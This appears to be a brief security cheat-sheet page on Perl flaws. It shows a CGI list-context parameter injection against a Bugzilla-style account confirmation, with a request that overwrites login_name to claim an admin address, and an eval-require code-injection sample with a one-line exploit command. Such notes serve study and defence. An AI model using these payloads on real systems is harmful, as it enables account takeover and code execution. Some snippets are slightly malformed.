Link to this headingPerl

Link to this headingCGI

Link to this headingLists

CGI when given multiple parameters (e.g., index.cgi?foo=1&foo=2&bar=a&bar=b) will return a list.

When using a list as a parameter in a hash table

@list = ('f', 'lol', 'wat'); $hash = {'a' => 'b', 'c' => 'd', 'e' => @list}; print $hash; {'a' => 'b', 'c' => 'd', 'e' => 'f', 'lol' => 'wat'};

In the example below, the realname parameter when given multiple values will be made into a list. This can be used to overwrite the login_name of the hash table.

Example:

my $otheruser = Bugzilla::User->create({ login_name => $login_name, realname => $cgi->param('realname'), cryptpassword=> $password})
a=confirm_new_account&t=[REGISTRATION_TOKEN]&passwd1=Password1!&passwd2=Password1!&realname=Lolzor&realname=login_name&realname=admin@bugzilla.org
my $otheruser = Bugzilla::User->create({ login_name => $login_name, realname => 'Lolzor', login_name => '[email protected]' cryptpassword => $password });

Link to this headingCode Injection

Code Injection with eval require

Sample Code:

package Some::Loader; use strict; use warnings; sub import { my $class = shift; for my $module (@_) { eval "require $module;" } } 1;

Sample Exploit:

perl -MSome::Loader='vars; exit' -E 'say "Hello, world!"'